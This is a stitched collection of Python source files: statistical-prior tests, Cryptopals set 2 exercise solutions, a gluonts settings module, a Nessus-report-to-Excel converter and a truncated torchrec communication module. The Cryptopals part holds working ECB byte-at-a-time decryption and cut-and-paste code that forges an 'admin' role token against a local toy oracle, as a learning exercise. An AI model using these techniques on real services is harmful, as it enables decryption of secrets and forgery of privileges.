def test__lower_limit_zero_or_below_raises_error(self):
with pytest.raises(exc.PriorException):
af.LogUniformPrior(lower_limit=-1.0, upper_limit=1.0)
with pytest.raises(exc.PriorException):
af.LogUniformPrior(lower_limit=0.0, upper_limit=1.0)
class TestGaussianPrior:
def test__simple_assumptions(self):
gaussian_simple = af.GaussianPrior(mean=0.0, sigma=1.0)
assert gaussian_simple.value_for(0.1) == pytest.approx(-1.281551, 1.0e-4)
assert gaussian_simple.value_for(0.9) == pytest.approx(1.281551, 1.0e-4)
assert gaussian_simple.value_for(0.5) == 0.0
def test__non_zero_mean(self):
gaussian_half = af.GaussianPrior(mean=0.5, sigma=2.0)
assert gaussian_half.value_for(0.1) == pytest.approx(-2.0631031, 1.0e-4)
assert gaussian_half.value_for(0.9) == pytest.approx(3.0631031, 1.0e-4)
assert gaussian_half.value_for(0.5) == 0.5
def test__log_prior_from_value(self):
gaussian_simple = af.GaussianPrior(mean=0.0, sigma=1.0)
log_prior = gaussian_simple.log_prior_from_value(value=0.0)
assert log_prior == 0.0
log_prior = gaussian_simple.log_prior_from_value(value=1.0)
assert log_prior == 0.5
log_prior = gaussian_simple.log_prior_from_value(value=2.0)
assert log_prior == 2.0
gaussian_simple = af.GaussianPrior(mean=1.0, sigma=2.0)
log_prior = gaussian_simple.log_prior_from_value(value=0.0)
assert log_prior == 0.125
log_prior = gaussian_simple.log_prior_from_value(value=1.0)
assert log_prior == 0.0
log_prior = gaussian_simple.log_prior_from_value(value=2.0)
assert log_prior == 0.125
gaussian_simple = af.GaussianPrior(mean=30.0, sigma=60.0)
log_prior = gaussian_simple.log_prior_from_value(value=2.0)
assert log_prior == pytest.approx(0.108888, 1.0e-4)
|
StarcoderdataPython
|
1684795
|
<gh_stars>0
import unittest
import random
from Crypto.Cipher import AES
from set1 import fromAscii, toAscii, fromB64
from set1 import fixedXor
from set1 import isECBEncrypted
def pkcs7Padding(data, blockSize=16):
missingBytesNumber = (-len(data))%blockSize
if missingBytesNumber == 0:
missingBytesNumber = blockSize
return data + bytes([missingBytesNumber for _ in range(missingBytesNumber)])
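# Worked example (illustrative, mirrors testChallenge9 below):
# pkcs7Padding(b'YELLOW SUBMARINE', 20) == b'YELLOW SUBMARINE\x04\x04\x04\x04',
# since 4 bytes are missing to reach the 20-byte block boundary.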
def pkcs7Unpadding(data):
paddingLength = int(data[len(data)-1])
return data[:-paddingLength]
def encryptAESCBC(data, key, iv=None):
if len(data) % 16 != 0:
raise Exception('Data length must be a multiple of 16 bytes')
if iv == None:
iv = bytes([0 for _ in range(16)])
res = bytes([])
for blockNumber in range(len(data)//16):
block = fixedXor(data[blockNumber*16:(blockNumber+1)*16], iv)
iv = AES.new(key, AES.MODE_ECB).encrypt(block)
res += iv
return res
def decryptAESCBC(data, key, iv=None):
if len(data) % 16 != 0:
raise Exception('Data length must be a multiple of 16 bytes')
if iv == None:
iv = bytes([0 for _ in range(16)])
res = bytes([])
for blockNumber in range(len(data)//16):
decryptedBlock = AES.new(key, AES.MODE_ECB).decrypt(data[blockNumber*16:(blockNumber+1)*16])
res += fixedXor(decryptedBlock, iv)
iv = data[blockNumber*16:(blockNumber+1)*16]
return res
def getRandomAESKey():
return bytes([random.randrange(0,256) for _ in range(16)])
UNKNOWN_AES_KEY = getRandomAESKey()
def oracle(data, key=None):
data = bytes([random.randrange(0,256) for _ in range(random.randrange(5,11))]) + data
data += bytes([random.randrange(0,256) for _ in range(random.randrange(5,11))])
data = pkcs7Padding(data)
isECB = True if random.randrange(2) == 0 else False
key = getRandomAESKey() if key == None else key
if isECB:
return AES.new(key).encrypt(data), isECB, key
else:
return encryptAESCBC(data, key), isECB, key
def encryptAESECBWithFixedSuffix(data, key=None, suffix=None):
# Default suffix comes from challenge 12
suffix = fromB64('<KEY>') if suffix == None else suffix
key = UNKNOWN_AES_KEY if key == None else key
return AES.new(key).encrypt(pkcs7Padding(data+suffix))
def encryptAESECBWithFixedPrefixSuffix(data, key=None, suffix=None, prefix=None):
# Default suffix comes from challenge 12
suffix = fromB64('Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGllcyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK') if suffix == None else suffix
prefix = fromAscii('Thats our fixed-length prefix') if prefix == None else prefix
key = UNKNOWN_AES_KEY if key == None else key
return AES.new(key).encrypt(pkcs7Padding(prefix+data+suffix))
def guessOracleBlockSize(oracle):
dataLength, ciphered = 0, oracle(bytes(0))
firstLength = len(ciphered)
while len(ciphered) == firstLength:
dataLength += 1
ciphered = oracle(bytes(dataLength))
blockSize = len(ciphered) - firstLength
dataLength -= 1
suffixLength = firstLength - dataLength
return blockSize, suffixLength
def guessSuffix(oracle):
blockSize, suffixLength = guessOracleBlockSize(oracle)
res = []
data = bytes(range(48,64))
foundBytes = 0
while foundBytes < suffixLength:
if (foundBytes % blockSize) == 0 and foundBytes > 0:
data = bytes(res[foundBytes-blockSize:foundBytes])
data = data[1:]
firstCipher = oracle(data)
targetBlock = firstCipher[(foundBytes//blockSize)*blockSize:(foundBytes//blockSize+1)*blockSize]
b, found = -1, False
while not(found):
b += 1
cipher = oracle(data + bytes(res[(foundBytes//blockSize)*blockSize:]) + bytes([b]))
found = (cipher[0:blockSize] == targetBlock)
res += [b]
foundBytes += 1
return bytes(res)
def parseKeyValue(string):
res = {}
for kv in string.split('&'):
key, value = kv.split('=')
res[key] = value
return res
def toKeyValueString(dic):
return '&'.join([key + '=' + str(dic[key]) for key in ['email', 'uid', 'role']])
def profileFor(email):
if '&' in email or '=' in email:
raise Exception('Illegal character in email: ' + email)
return toKeyValueString({'email': email, 'uid': 10, 'role': 'user'})
def encryptUserProfile(email):
return AES.new(UNKNOWN_AES_KEY).encrypt(pkcs7Padding(fromAscii(profileFor(email))))
def decryptUserProfile(data):
profileString = pkcs7Unpadding(AES.new(UNKNOWN_AES_KEY).decrypt(data))
return parseKeyValue(toAscii(profileString))
class Tester(unittest.TestCase):
def testChallenge9(self):
input = fromAscii('YELLOW SUBMARINE')
output = fromAscii('YELLOW SUBMARINE\x04\x04\x04\x04')
self.assertEqual(pkcs7Padding(input, 20), output)
def testChallenge10(self):
input = fromAscii('YELLOW SUBMARINEYELLOW SUBMARINE')
key = b'YELLOW SUBMARINE'
self.assertEqual(decryptAESCBC(encryptAESCBC(input, key), key), input)
with open('resources/set2-challenge10.txt', 'r') as testDataFile:
input = fromB64(testDataFile.read().replace('\n', ''))
self.assertIn(b'Let the witch doctor, Ice, do the dance to cure ', decryptAESCBC(input, key))
def testChallenge11(self):
for _ in range(100):
cipheredData, isECB, key = oracle(bytes(100))
self.assertEqual(isECB, isECBEncrypted(cipheredData))
def testChallenge12(self):
self.assertEqual(guessOracleBlockSize(encryptAESECBWithFixedSuffix)[0], 16)
self.assertEqual(True, isECBEncrypted(encryptAESECBWithFixedSuffix(bytes(100))))
suffix = guessSuffix(encryptAESECBWithFixedSuffix)
self.assertIn('The girlies on standby waving just to say hi', toAscii(suffix))
def testChallenge13(self):
input = '<EMAIL>'
cipheredProfile = encryptUserProfile(input)
clearProfile = decryptUserProfile(cipheredProfile)
self.assertEqual('user', clearProfile['role'])
# First, we build an email such that the length of the string "email=EMAIL&uid=10&role=" is a multiple of 16
email = ''.join('a' for _ in range(-(len("email=&uid=10&role="))%16))
email += '@letstrythis.com' # Adding a 16 characters-long string for style
honestCipher = encryptUserProfile(email)
# Then we build an email that will give us the cipher of 'admin\x0b\x0b...\x0b'
fakeEmail = ''.join(['a' for _ in range(10)])
fakeEmail += 'admin' + ''.join([chr(11) for _ in range(11)])
fakeProfileCipher = encryptUserProfile(fakeEmail)
adminBlock = fakeProfileCipher[16:32]
        # And we replace the end of our honestCipher with this block
tamperedCipher = honestCipher[:-16]
tamperedCipher += adminBlock
tamperedProfile = decryptUserProfile(tamperedCipher)
self.assertEqual(email, tamperedProfile['email'])
self.assertEqual('admin', tamperedProfile['role'])
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
1681879
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
gluonts.core.settings
~~~~~~~~~~~~~~~~~~~~~
This module offers a `Settings` class, which makes it possible to manage a
global context.
The idea is to support a form of dependency injection, where instead of passing
a concrete value along the call-chain, it is shared through the settings.
`gluonts.env` is a `Settings`.
Example::
from gluonts.core.settings import Settings
class MySettings(Settings):
debug: bool = False
settings = MySettings()
def fn():
if settings.debug:
print("In debug mode.")
with settings._let(debug=True):
# this will print the message
fn()
# no message will be printed
fn()
Another option is to inject the context into a function. This has the advantage
that you can still pass values manually, but use the context as a fallback::
@settings._inject("debug")
def fn(debug):
...
# this will use the value defined in the context
fn()
# but one can still set the value manually
fn(False)
Value access is possible with both getitem (`setting["name"]`) and getattr
(`setting.name`). To avoid possible name-conflicts, all methods on `Settings`
use a leading underscore (e.g. `settings._let`). Consequently, keys are not
allowed to start with an underscore.
`Settings` contains a default dictionary, which can be written to directly and
is used by `_declare`.
Additionally, it's possible to declare a type, which is checked using pydantic.
Whenever a new value is set, it is type-checked.
"""
import functools
import inspect
from operator import attrgetter
from typing import Any
import pydantic
class Dependency:
def __init__(self, fn, dependencies):
self.fn = fn
self.dependencies = dependencies
def resolve(self, env):
kwargs = {key: env[key] for key in self.dependencies}
return self.fn(**kwargs)
class _Config:
arbitrary_types_allowed = True
class Settings:
_cls_types: dict = {}
_cls_deps: dict = {}
def __init_subclass__(cls):
cls._cls_types = {}
for name, ty in cls.__annotations__.items():
if ty == Dependency:
cls._cls_deps[name] = getattr(cls, name)
else:
default = getattr(cls, name, ...)
cls._cls_types[name] = ty, default
def __init__(self, *args, **kwargs):
# mapping of key to type, see `_declare` for more info on how this
# works
self._types = {}
self._default = {}
self._dependencies = {}
self._context_count = 0
# We essentially implement our own chainmap, managed by a list. New
# entries appended to the right; thus, the chain acts as a stack. It is
# ensured that there are always at least two entries in the chain:
# A default, used to declare default values for any given key and a
# base to guard from writing to the default through normal access.
self._chain = [self._default, kwargs]
        # If subclassed, `_cls_types` can contain declarations which we need to
# execute.
for key, (ty, default) in self._cls_types.items():
self._declare(key, ty, default=default)
# Same thing for dependencies.
for name, fn in self._cls_deps.items():
self._dependency(name, fn)
def _reduce(self):
""""""
assert not self._context_count, "Cannot reduce within with-blocks."
compact = {}
for dct in self._chain[1:]:
compact.update(dct)
self._chain = [self._default, compact]
def _already_declared(self, key):
return key in self._types or key in self._dependencies
def _declare(self, key, type=Any, *, default=...):
assert not self._already_declared(
key
), f"Attempt of overwriting already declared value {key}"
# This is kinda hacky. For each key, we create a new pydantic model,
# which contains just one definition, effectively, like this:
#
# class foo(pydantic.BaseModel):
# foo: type
#
# When we want to evaluate, we do this:
#
# # given
# settings.foo = value
#
# # becomes
# settings._types["foo"].parse_obj({"foo": value}).foo
self._types[key] = pydantic.create_model(
key, **{key: (type, ...)}, __config__=_Config
)
# we use our own default-handling, instead of relying on pydantic
if default != ...:
self._set_(self._default, key, default)
def _dependency(self, name, fn):
dependencies = list(inspect.signature(fn).parameters)
for dependency in dependencies:
assert self._already_declared(
dependency
), f"`{name}` depends on `{dependency}`, which has not been declared yet."
self._dependencies[name] = Dependency(fn, dependencies)
def _get(self, key, default=None):
"""Like `dict.get`."""
try:
return self[key]
except KeyError:
return default
def __contains__(self, key):
try:
self[key]
return True
except KeyError:
return False
def __getitem__(self, key):
# Iterate all dicts, last to first, and return value as soon as one is
# found.
if key in self._dependencies:
return self._dependencies[key].resolve(self)
for dct in reversed(self._chain):
try:
return dct[key]
except KeyError:
pass
raise KeyError(key)
def __getattribute__(self, key):
        # Check the key to decide whether we want to access our chainmap
        # or handle it as a normal attribute.
if key.startswith("_"):
return super().__getattribute__(key)
else:
return self[key]
def _set_(self, dct, key, value):
"""Helper method to assign item to a given dictionary.
Uses `_types` to type-check the value, before assigning.
"""
assert key not in self._dependencies, "Can't override dependency."
# If we have type-information, we apply the pydantic-model to the value
model = self._types.get(key)
if model is not None:
# If `settings.foo` is a pydantic model, we want to allow partial
# assignment: `settings.foo = {"b": 1}` should only set `b`
# Thus we check whether we are dealing with a pydantic model and if
# we are also assigning a `dict`:
is_pydantic_model = issubclass(
model.__fields__[key].type_, pydantic.BaseModel
)
if is_pydantic_model and isinstance(value, dict):
value = self[key].copy(update=value)
else:
value = getattr(model.parse_obj({key: value}), key)
dct[key] = value
def __setitem__(self, key, value):
# Always assigns to the most recent dictionary in our chain.
self._set_(self._chain[-1], key, value)
def __setattr__(self, key, value):
# Same check as in `__getattribute__`.
if key.startswith("_"):
super().__setattr__(key, value)
else:
self[key] = value
def _push(self, **kwargs):
"""Add new entry to our chain-map.
Values are type-checked.
"""
self._chain.append({})
# Since we want to type-check, we add the entries manually.
for key, value in kwargs.items():
self[key] = value
return self
def _pop(self):
assert len(self._chain) > 2, "Can't pop initial setting."
return self._chain.pop()
def __repr__(self):
inner = ", ".join(list(repr(dct) for dct in self._chain))
return f"<Settings [{inner}]>"
def _let(self, **kwargs) -> "_ScopedSettings":
"""Create a new context, where kwargs are added to the chain::
with settings._let(foo=42):
                assert settings.foo == 42
`_let` does not push a new context, but returns a `_ScopedSettings`
object, that pushes the context, when entered through a
`with`-statement.
"""
return _ScopedSettings(self, kwargs)
def _inject(self, *keys, **kwargs):
"""Dependency injection.
        This will inject values from settings if available and not passed
directly::
@settings._inject("foo")
def fn(foo=1):
return foo
            # Since foo is not available in settings, the function's default
# value is taken.
assert fn() == 1
with settings._let(foo=2):
# Since foo is declared in the settings, it is used.
assert fn() == 2
# Directly passed values always take precedence.
assert fn(3) == 3
"""
def dec(fn):
# We need the signature to be able to assemble the args later.
sig = inspect.signature(fn)
getters = {}
for key in keys:
assert key in sig.parameters, f"Key {key} not in arguments."
getters[key] = attrgetter(key)
for key, path in kwargs.items():
assert key in sig.parameters, f"Key {key} not in arguments."
assert key not in getters, f"Key {key} defined twice."
getters[key] = attrgetter(path)
@functools.wraps(fn)
def wrapper(*args, **kwargs):
# arguments are always keyword params
arguments = sig.bind_partial(*args, **kwargs).arguments
setting_kwargs = {}
for key, getter in getters.items():
if key not in arguments:
try:
setting_kwargs[key] = getter(self)
except (KeyError, AttributeError):
continue
return fn(**arguments, **setting_kwargs)
return wrapper
return dec
class _ScopedSettings:
def __init__(self, settings, kwargs):
self.settings = settings
self.kwargs = kwargs
def __enter__(self):
self.settings._context_count += 1
return self.settings._push(**self.kwargs)
def __exit__(self, *args):
self.settings._context_count -= 1
self.settings._pop()
def let(settings, **kwargs):
"`let(settings, ...)` is the same as `settings._let(...)`."
return settings._let(**kwargs)
def inject(settings, *args, **kwargs):
"`inject(settings, ...)` is the same as `settings._inject(...)`."
return settings._inject(*args, **kwargs)
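
# Usage sketch (illustrative, not part of gluonts). Exercises the declared
# defaults, `_let` and `_inject` described in the module docstring; the setting
# names and values are made up.
def _example_settings():
    class MySettings(Settings):
        debug: bool = False
        retries: int = 3

    settings = MySettings()

    @settings._inject("retries")
    def fetch(url, retries):
        return url, retries

    assert settings.debug is False
    with settings._let(debug=True, retries=5):
        # values from the pushed scope are used as fallbacks
        assert settings.debug is True
        assert fetch("http://example.com") == ("http://example.com", 5)
    # outside the with-block the declared defaults apply again
    assert fetch("http://example.com") == ("http://example.com", 3)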
|
StarcoderdataPython
|
46692
|
# coding: utf-8
# !/usr/bin/env python3
import csv
import os, os.path
import sys
import argparse
from WriteExcel import Excel
from log import debug, info, error
from baidu_traslate import *
class Nessus(object):
"""处理Nessus扫描结果"""
def __init__(self, csv_name):
self.csv_name = csv_name
self.all_csv_res = []
if os.path.isfile(self.csv_name):
os.chdir(os.path.dirname(os.path.abspath(self.csv_name)))
self.read_csv(self.csv_name)
else:
os.chdir(self.csv_name)
self.file_list = [file for file in os.listdir() if os.path.isfile(file) and file.endswith('.csv')]
for file in self.file_list:
debug(file)
self.read_csv(file)
def __len__(self):
return len(self.all_csv_res)
def __iter__(self):
return iter(self.all_csv_res)
def __next__(self):
pass
def read_csv(self, file):
with open(file, 'r') as csv_file:
csv_res = csv.reader(csv_file)
debug(csv_res)
for row in csv_res:
debug(row)
if row not in self.all_csv_res:
self.all_csv_res.append(row)
all_res = self.all_csv_res
return all_res
def check_risk(risk):
if risk == 'None':
return 'None'
elif risk == 'Low':
return '低危'
elif risk == 'Medium':
return '中危'
elif risk == 'High':
return '高危'
elif risk == 'Critical':
return '严重'
def get_args():
    parser = argparse.ArgumentParser(prog='nessusor', description='By default, an xls document is generated in the program directory')
    parser.add_argument("-p", help="Directory containing the reports, or the full path to the Nessus csv file", type=str)
    parser.add_argument("-s", help="Name of the output file to save", type=str)
args = parser.parse_args()
return vars(args)
if __name__ == '__main__':
args = get_args()
path = args['p']
output = args['s']
if path is None or output is None:
print("""python3 Nessus.py -p /path/nessus.csv or /path -s xxx""")
sys.exit(0)
try:
# nessus = Nessus('/Users/m1k3/127_0_0_1_yi2b5q.csv')
nessus = Nessus(path)
new_nessus = []
for i in nessus:
risk = check_risk(i[3])
if risk == 'None':
pass
# CVE CVSS Risk Host Protocol Port Name Synopsis Description Solution
else:
name = translate(i[7])
synopsis = translate(i[8])
description = translate(i[9])
solution = translate(i[10])
row = (i[1], i[2], risk, i[4], i[5], i[6], name, synopsis, description, solution)
# info(list(row))
new_nessus.append(list(row))
excel = Excel(output + '.xls', '/Users/m1k3', new_nessus)
excel.write_data()
except (Exception,KeyboardInterrupt) as e:
error(e)
|
StarcoderdataPython
|
101896
|
<filename>torchrec/distributed/comm_ops.py
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from dataclasses import dataclass, field
from typing import List, Optional, Tuple, TypeVar, Any
import torch
import torch.distributed as dist
from torch import Tensor
from torch.autograd import Function
from torch.autograd.profiler import record_function
from torchrec.distributed.types import Awaitable, NoWait
try:
torch.ops.load_library("//deeplearning/fbgemm/fbgemm_gpu:sparse_ops")
torch.ops.load_library("//deeplearning/fbgemm/fbgemm_gpu:sparse_ops_cpu")
except OSError:
pass
# OSS
try:
import fbgemm_gpu # @manual # noqa
except ImportError:
pass
W = TypeVar("W")
# TODO: T96382816, NE Parity Backward compatibility
GRADIENT_DIVISION: bool = True
def set_gradient_division(val: bool) -> None:
global GRADIENT_DIVISION
GRADIENT_DIVISION = val
# Some commonly used notations for comm ops:
# B - batch size
# T - number of embedding tables
# D - embedding dimension
class Request(Awaitable[W]):
"""
Defines a collective operation request for a process group on a tensor.
Constructor Args:
pg (dist.ProcessGroup): The process group the request is for.
"""
# pyre-fixme[11]: Annotation `ProcessGroup` is not defined as a type.
def __init__(self, pg: dist.ProcessGroup) -> None:
super().__init__()
self.pg: dist.ProcessGroup = pg
# pyre-fixme[11]: Annotation dist.Work is not defined as a type.
self.req: Optional[dist.Work] = None
self.tensor: Optional[W] = None
self.a2ai = None # type: ignore
self.rsi = None # type: ignore
self.wait_function = None # type: ignore
def _wait_impl(self) -> W:
"""
Calls the wait function for this request.
"""
ret = self.wait_function.apply(self.pg, self, self.tensor)
self.req = None
self.tensor = None
return ret
@dataclass
class All2AllPooledInfo(object):
"""
The data class that collects the attributes when calling the alltoall_pooled
operation.
Attributes:
dim_sum_per_rank (List[int]): number of features (sum of dimensions) of the
embedding in each rank.
dim_sum_per_rank_tensor (Optional[Tensor]): the tensor version of
`dim_sum_per_rank`, this is only used by the fast kernel of
`_recat_pooled_embedding_grad_out`.
cumsum_dim_sum_per_rank_tensor (Optional[Tensor]): cumulative sum of
dim_sum_per_rank, this is only used by the fast kernel of
`_recat_pooled_embedding_grad_out`.
        mixed_dim (bool): whether the input has mixed dimensions.
D (int): embedding dimension of the embedding table.
B_local (int): local batch size before scattering.
"""
dim_sum_per_rank: List[int]
dim_sum_per_rank_tensor: Optional[Tensor]
cumsum_dim_sum_per_rank_tensor: Optional[Tensor]
mixed_dim: bool
    D: int = -1  # -1 means not used
B_local: int = -1
@dataclass
class All2AllSequenceInfo(object):
"""
The data class that collects the attributes when calling the alltoall_sequence
operation.
Attributes:
embedding_dim (int): embedding dimension.
lengths_after_sparse_data_all2all (Tensor): lengths of sparse features after
AlltoAll.
forward_recat_tensor (Tensor): recat tensor for forward.
backward_recat_tensor (Tensor): recat tensor for backward.
input_splits (List[int]): input splits.
output_splits (List[int]): output splits.
lengths_sparse_before_features_all2all (Optional[Tensor]): lengths of sparse
features before AlltoAll.
"""
embedding_dim: int
lengths_after_sparse_data_all2all: Tensor
forward_recat_tensor: Tensor
backward_recat_tensor: Tensor
input_splits: List[int]
output_splits: List[int]
permuted_lengths_after_sparse_data_all2all: Optional[Tensor] = None
@dataclass
class All2AllVInfo(object):
"""
The data class that collects the attributes when calling the alltoallv operation.
Attributes:
dim_sum_per_rank (List[int]): number of features (sum of dimensions) of the
embedding in each rank.
B_global (int): global batch size for each rank.
B_local (int): local batch size before scattering.
        B_local_list (List[int]): local batch sizes for each embedding table locally
(in my current rank).
D_local_list (List[int]): embedding dimension of each embedding table locally
(in my current rank).
input_split_sizes (List[int]): The input split sizes for each rank, this
remembers how to split the input when doing the all_to_all_single operation.
output_split_sizes (List[int]): The output split sizes for each rank, this
remembers how to fill the output when doing the all_to_all_single operation.
"""
dims_sum_per_rank: List[int]
B_global: int
B_local: int
B_local_list: List[int]
D_local_list: List[int]
input_split_sizes: List[int] = field(default_factory=list)
output_split_sizes: List[int] = field(default_factory=list)
@dataclass
class ReduceScatterInfo(object):
"""
The data class that collects the attributes when calling the reduce_scatter_pooled
operation.
Attributes:
input_sizes (List[int]): the sizes of the input tensors. This remembers the
sizes of the input tensors when running the backward pass and producing the
gradient.
"""
input_sizes: List[int]
def _get_split_lengths_by_len(
world_size: int, my_rank: int, n: int
) -> Tuple[int, List[int]]:
k, m = divmod(n, world_size)
if m == 0:
splits = [k] * world_size
my_len = k
else:
splits = [(k + 1) if i < m else k for i in range(world_size)]
my_len = splits[my_rank]
return (my_len, splits)
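# Worked example (illustrative only, not part of the original module): splitting
# n=10 items across world_size=4 ranks gives divmod(10, 4) == (2, 2), so the first
# two ranks receive one extra item:
#   _get_split_lengths_by_len(world_size=4, my_rank=1, n=10) -> (3, [3, 3, 2, 2])
#   _get_split_lengths_by_len(world_size=4, my_rank=3, n=10) -> (2, [3, 3, 2, 2])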
def alltoall_pooled(
a2a_pooled_embs_tensor: Tensor,
dim_sum_per_rank: List[int],
mixed_dim: bool = False,
dim_sum_per_rank_tensor: Optional[Tensor] = None,
cumsum_dim_sum_per_rank_tensor: Optional[Tensor] = None,
group: Optional[dist.ProcessGroup] = None,
) -> Awaitable[Tensor]:
"""
Performs AlltoAll operation for a single pooled embedding tensor. Each process
splits the input pooled embeddings tensor based on the world size, and then scatters
the split list to all processes in the group. Then concatenates the received tensors
from all processes in the group and returns a single output tensor.
Args:
a2a_pooled_embs_tensor (Tensor): input pooled embeddings. Must be pooled
together before passing into this function. Usually with the shape of
B x T x D, where B - batch size, T - number of embedding tables,
D - embedding dimension. When `mixed_dim=True`, the input shape should be
B x D_local_sum, where D_local_sum is the dimension sum of all the local
embedding tables.
dim_sum_per_rank (List[int]): number of features (sum of dimensions) of the
embedding in each rank.
        mixed_dim (bool): whether the input has mixed embedding dimensions.
dim_sum_per_rank_tensor (Optional[Tensor]): the tensor version of
`dim_sum_per_rank`, this is only used by the fast kernel of
`_recat_pooled_embedding_grad_out`.
cumsum_dim_sum_per_rank_tensor (Optional[Tensor]): cumulative sum of
dim_sum_per_rank, this is only used by the fast kernel of
`_recat_pooled_embedding_grad_out`.
group (Optional[dist.ProcessGroup]): The process group to work on. If None, the
default process group will be used.
Returns:
Async work handle (Awaitable), which can be `wait()` later to get the resulting
tensor.
.. warning::
`alltoall_pooled` is experimental and subject to change.
"""
if group is None:
group = dist.distributed_c10d._get_default_group()
if dist.get_world_size(group) <= 1:
return NoWait(a2a_pooled_embs_tensor)
myreq = Request(group)
a2ai = All2AllPooledInfo(
dim_sum_per_rank=dim_sum_per_rank,
dim_sum_per_rank_tensor=dim_sum_per_rank_tensor,
cumsum_dim_sum_per_rank_tensor=cumsum_dim_sum_per_rank_tensor,
mixed_dim=mixed_dim,
)
# pyre-fixme[16]: `All2All_Pooled_Req` has no attribute `apply`.
All2All_Pooled_Req.apply(group, myreq, a2ai, a2a_pooled_embs_tensor)
return myreq
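# Hypothetical usage sketch (not part of the original module). It assumes
# torch.distributed is already initialized and that this rank holds T_local pooled
# embedding tables of dimension D; the argument names are illustrative only.
def _example_alltoall_pooled(pooled_embs: Tensor, dim_sum_per_rank: List[int]) -> Tensor:
    # pooled_embs: (B_global, T_local, D) pooled embeddings computed on this rank
    awaitable = alltoall_pooled(pooled_embs, dim_sum_per_rank)
    # wait() blocks until the AlltoAll completes and returns the gathered tensor
    return awaitable.wait()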
def alltoall_sequence(
# (T, B, L_i * D) flattened
a2a_sequence_embs_tensor: Tensor,
forward_recat_tensor: Tensor,
backward_recat_tensor: Tensor,
lengths_after_sparse_data_all2all: Tensor,
input_splits: List[int],
output_splits: List[int],
group: Optional[dist.ProcessGroup] = None,
) -> Awaitable[Tensor]:
"""
Performs AlltoAll operation for sequence embeddings. Each process splits the input
tensor based on the world size, and then scatters the split list to all processes in
the group. Then concatenates the received tensors from all processes in the group
and returns a single output tensor.
Note:
AlltoAll operator for (T * B * L_i, D) tensors.
Does not support mixed dimensions.
Args:
a2a_sequence_embs_tensor (Tensor): input embeddings. Usually with the shape of
(T * B * L_i, D), where B - batch size, T - number of embedding tables,
D - embedding dimension.
forward_recat_tensor (Tensor): recat tensor for forward.
backward_recat_tensor (Tensor): recat tensor for backward.
lengths_after_sparse_data_all2all (Tensor): lengths of sparse features after
AlltoAll.
        input_splits (List[int]): input splits.
        output_splits (List[int]): output splits.
group (Optional[dist.ProcessGroup]): The process group to work on. If None, the
default process group will be used.
Returns:
Async work handle (Awaitable), which can be `wait()` later to get the resulting
tensor.
.. warning::
`alltoall_sequence` is experimental and subject to change.
"""
if group is None:
group = dist.distributed_c10d._get_default_group()
if dist.get_world_size(group) <= 1:
return NoWait(a2a_sequence_embs_tensor)
myreq = Request(group)
a2ai = All2AllSequenceInfo(
embedding_dim=a2a_sequence_embs_tensor.shape[1],
lengths_after_sparse_data_all2all=lengths_after_sparse_data_all2all,
forward_recat_tensor=forward_recat_tensor,
backward_recat_tensor=backward_recat_tensor,
input_splits=input_splits,
output_splits=output_splits,
)
# sequence of embeddings, bags are definitely non-uniform
# pyre-fixme[16]: `All2All_Seq_Req` has no attribute `apply`.
All2All_Seq_Req.apply(group, myreq, a2ai, a2a_sequence_embs_tensor)
return myreq
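# Hypothetical usage sketch (not part of the original module). All tensors and split
# lists are assumed to come from an earlier sparse-data AlltoAll; the names are
# illustrative only.
def _example_alltoall_sequence(
    seq_embs: Tensor,  # (T * B * L_i, D) flattened sequence embeddings
    forward_recat: Tensor,
    backward_recat: Tensor,
    lengths_after_a2a: Tensor,
    input_splits: List[int],
    output_splits: List[int],
) -> Tensor:
    awaitable = alltoall_sequence(
        seq_embs,
        forward_recat,
        backward_recat,
        lengths_after_a2a,
        input_splits,
        output_splits,
    )
    return awaitable.wait()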
def alltoallv(
inputs: List[Tensor],
out_split: Optional[List[int]] = None,
per_rank_split_lengths: Optional[List[int]] = None,
group: Optional[dist.ProcessGroup] = None,
) -> Awaitable[List[Tensor]]:
"""
Performs alltoallv operation for a list of input embeddings. Each process scatters
the list to all processes in the group.
Args:
        inputs (List[Tensor]): list of tensors to scatter, one per local embedding
            table; the tensors usually have different embedding dimensions.
        out_split (Optional[List[int]]): output split sizes (or dim_sum_per_rank). If
            not specified, `per_rank_split_lengths` is used to construct an output
            split, assuming all the embeddings have the same dimension.
per_rank_split_lengths (Optional[List[int]]): split lengths per rank. If not
specified, the `out_split` must be specified.
group (Optional[dist.ProcessGroup]): The process group to work on. If None, the
default process group will be used.
Returns:
Async work handle (Awaitable), which can be `wait()` later to get the resulting
list of tensors.
.. warning::
`alltoallv` is experimental and subject to change.
"""
if group is None:
group = dist.distributed_c10d._get_default_group()
world_size = dist.get_world_size(group)
my_rank = dist.get_rank(group)
myreq = Request(group)
B_global, _ = inputs[0].size()
D_local_list = [e.size()[1] for e in inputs]
B_local, B_local_list = _get_split_lengths_by_len(world_size, my_rank, B_global)
if out_split is not None:
dims_sum_per_rank = out_split
elif per_rank_split_lengths is not None:
# all the embs have the same dimension
dims_sum_per_rank = [s * D_local_list[0] for s in per_rank_split_lengths]
else:
raise RuntimeError("Need to specify either out_split or per_rank_split_lengths")
a2ai = All2AllVInfo(
dims_sum_per_rank=dims_sum_per_rank,
B_local=B_local,
B_local_list=B_local_list,
D_local_list=D_local_list,
B_global=B_global,
)
# pyre-fixme[16]: `All2Allv_Req` has no attribute `apply`.
All2Allv_Req.apply(group, myreq, a2ai, inputs)
return myreq
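# Hypothetical usage sketch (not part of the original module). Each tensor in `embs`
# is assumed to be the (B_global, D_t) output of one local embedding table, and
# `out_split` plays the role of dim_sum_per_rank.
def _example_alltoallv(embs: List[Tensor], out_split: List[int]) -> List[Tensor]:
    awaitable = alltoallv(embs, out_split=out_split)
    return awaitable.wait()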
def reduce_scatter_pooled(
inputs: List[Tensor],
